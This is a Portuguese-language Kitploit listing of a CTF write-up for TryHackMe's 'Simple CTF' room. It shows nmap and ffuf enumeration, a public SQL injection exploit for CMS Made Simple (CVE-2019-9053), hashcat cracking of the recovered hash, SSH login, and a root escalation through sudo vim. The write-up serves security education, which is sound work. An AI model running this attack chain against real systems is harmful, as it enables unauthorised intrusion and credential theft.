Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Simple-CTF-Writeup — Walkthrough profissional do TryHackMe Simple CTF cobrindo enumeração, injeção SQL no CMS Made Simple (CVE-2019-9053), recuperação de credenciais, acesso SSH, escalonamento de privilégios via Vim e comprometimento root. | Kitploit
Ferramentas/GitHubGitHub/imperialx1104/simple-ctf-writeup
Quebra de SenhasEscalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

Walkthrough profissional do TryHackMe Simple CTF cobrindo enumeração, injeção SQL no CMS Made Simple (CVE-2019-9053), recuperação de credenciais, acesso SSH, escalonamento de privilégios via Vim e comprometimento root.

Ver Repositório
há 2 mesesAinda não revisado

Writeup do Simple CTF

Walkthrough profissional do TryHackMe Simple CTF cobrindo enumeração, SQL Injection no CMS Made Simple (CVE-2019-9053), recuperação de credenciais, acesso SSH, escalonamento de privilégio via Vim e comprometimento de root.

TryHackMe - Writeup do Simple CTF

Um walkthrough completo da sala Simple CTF no TryHackMe, cobrindo reconhecimento, enumeração, exploração, recuperação de credenciais, escalonamento de privilégio e captura de flags.


Informações da Sala

CampoValor
PlataformaTryHackMe
Nome da SalaSimple CTF
DificuldadeFácil
CategoriaExploração Web & Escalonamento de Privilégio Linux
AutorSaahil Gupta (ImperialX1104)

Objetivo

O objetivo desta sala é:

  • Enumerar a máquina alvo
  • Descobrir serviços e aplicações ocultos
  • Explorar um CMS vulnerável
  • Recuperar credenciais
  • Obter acesso SSH
  • Escalonar privilégios para root
  • Capturar ambas as flags

Visão Geral do Ataque

root@kitploit:~
Host Discovery
      │
      ▼
Port Enumeration
      │
      ▼
Directory Enumeration
      │
      ▼
CMS Discovery
      │
      ▼
Version Identification
      │
      ▼
SQL Injection (CVE-2019-9053)
      │
      ▼
Credential Extraction
      │
      ▼
Password Cracking
      │
      ▼
SSH Access
      │
      ▼
User Flag
      │
      ▼
Privilege Escalation
      │
      ▼
Root Flag

Reconhecimento

Descoberta de Host

O primeiro passo foi verificar a conectividade com a máquina alvo.

Comando

root@kitploit:~
ping 10.49.175.174

Resultado

O host respondeu com sucesso, confirmando que estava acessível.

Captura de Tela

Ping Scan


Enumeração de Portas

Uma varredura Nmap abrangente foi realizada para identificar serviços expostos.

Comando

root@kitploit:~
nmap -A -v 10.49.175.174

Resultados

PortaServiçoVersão
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

Descobertas Notáveis

  • Login FTP anônimo habilitado
  • Servidor web Apache em execução
  • SSH exposto na porta 2222
  • Arquivo robots.txt descoberto

Captura de Tela

Nmap Enumeration


Enumeração Web

Navegando até o servidor web alvo exibiu a página inicial padrão do Apache.

URL

root@kitploit:~
http://10.49.175.174

Captura de Tela

Apache Default Page

Nesta fase, nenhuma superfície de ataque óbvia era visível.


Enumeração de Diretórios

Para identificar recursos ocultos, foi realizada uma força bruta de diretórios usando FFUF.

Comando

root@kitploit:~
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

Resultados

root@kitploit:~
simple [Status: 301]

Captura de Tela

FFUF Enumeration

Um diretório chamado /simple foi descoberto.


Descoberta do CMS

Navegando até o diretório descoberto revelou uma instalação de CMS.

URL

root@kitploit:~
http://10.49.175.174/simple

Captura de Tela

CMS Made Simple

CMS Identificado

root@kitploit:~
CMS Made Simple 2.2.8

O número da versão mais tarde se mostraria crítico.


Pesquisa de Vulnerabilidade

A versão do CMS foi pesquisada usando SearchSploit.

Comando

root@kitploit:~
searchsploit "CMS Made Simple"

Resultado

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection

Captura de Tela

SearchSploit Results

Uma vulnerabilidade conhecida de SQL Injection foi identificada.


Aquisição do Exploit

O exploit foi copiado localmente para análise e execução.

Comando

root@kitploit:~
searchsploit -m 46635

Saída

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

Captura de Tela

Exploit Download


Exploração

O exploit disponível publicamente foi executado contra a instância do CMS alvo.

Comando

root@kitploit:~
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

Extração de Credenciais

O exploit extraiu com sucesso informações do banco de dados de backend.

Saída

root@kitploit:~
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

Captura de Tela

Credential Extraction

Informações Recuperadas

ItemValor
Usernamemitch
Email[email protected]
Salt1dac0d92e9fa6bb2

Quebra de Senha

O hash extraído foi quebrado usando Hashcat.

Comando

root@kitploit:~
hashcat -m 20 hash.txt --show

Saída

root@kitploit:~
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

Credenciais Recuperadas

CampoValor
Usernamemitch
Senhasecret

Captura de Tela

Hashcat Password Recovery


Acesso Inicial

As credenciais recuperadas foram testadas contra o serviço SSH.

Comando

root@kitploit:~
ssh [email protected] -p 2222

Senha

root@kitploit:~
secret

Resultado

root@kitploit:~
Welcome to Ubuntu 16.04.6 LTS

Captura de Tela

SSH Access

A autenticação bem-sucedida forneceu acesso ao shell como usuário mitch.


Flag de Usuário

Após obter acesso, a flag de usuário foi localizada no diretório home de Mitch.

Comandos

root@kitploit:~
whoami
cd ~
cat user.txt

Saída

root@kitploit:~
G00d j0b, keep up!

Captura de Tela

User Flag


Escalonamento de Privilégio

Enumeração de Sudo

Verificar as permissões sudo revelou uma configuração interessante.

Comando

root@kitploit:~
sudo -l

Saída

root@kitploit:~
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Captura de Tela

sudo -l Output

Essa configuração permite que o usuário execute o Vim com privilégios de root sem fornecer uma senha.


Acesso Root

Iniciando o Vim como root:

root@kitploit:~
sudo vim

Como o Vim estava sendo executado com privilégios elevados, poderia ser usado para acessar arquivos de propriedade do root.

Captura de Tela

Root Access via Vim


Flag Root

A flag root estava localizada no diretório do usuário root.

Comando

root@kitploit:~
:! cat /root/root.txt

Saída

root@kitploit:~
W3ll d0n3. You made it!

Captura de Tela

Root Flag


Flags Capturadas

Flag de Usuário

root@kitploit:~
G00d j0b, keep up!

Flag Root

root@kitploit:~
W3ll d0n3. You made it!

Resumo da Cadeia de Ataque

root@kitploit:~
Nmap Scan
    ↓
Web Enumeration
    ↓
Directory Discovery (/simple)
    ↓
CMS Made Simple 2.2.8
    ↓
SearchSploit Research
    ↓
CVE-2019-9053 SQL Injection
    ↓
Credential Extraction
    ↓
Hash Cracking
    ↓
SSH Login (mitch:secret)
    ↓
User Flag
    ↓
sudo -l
    ↓
Vim Privilege Escalation
    ↓
Root Flag

Lições Aprendidas

Enumeração é Importante

O CMS vulnerável não estava visível na página inicial e exigiu enumeração de diretórios para ser descoberto.

Identificação de Versão é Crítica

Saber a versão exata do CMS levou diretamente a uma vulnerabilidade conhecida.

Reutilização de Credenciais

Credenciais recuperadas devem sempre ser testadas contra todos os serviços disponíveis.

Configurações Incorretas de Sudo São Perigosas

Permitir a execução privilegiada de editores como o Vim pode levar ao comprometimento total do sistema.


Ferramentas Utilizadas

  • Nmap
  • FFUF
  • SearchSploit
  • Python
  • Hashcat
  • SSH
  • Vim

Conclusão

Esta sala demonstrou uma cadeia de ataque completa desde a enumeração inicial até o comprometimento total do root. Combinando enumeração de aplicações web, exploração de SQL injection, quebra de senhas e técnicas de escalonamento de privilégio no Linux, foi alcançado o controle total do sistema alvo.

A sala serve como uma excelente introdução à metodologia de teste de penetração no mundo real e destaca a importância de patches de software adequados, segurança de credenciais e controles de acesso com privilégios mínimos.


Autor

Saahil Gupta (ImperialX1104)

  • GitHub: https://github.com/ImperialX1104
  • TryHackMe: ImperialX

⭐ Se você achou este writeup útil, considere dar uma estrela no repositório e conectar-se comigo no GitHub.

Baixar ferramenta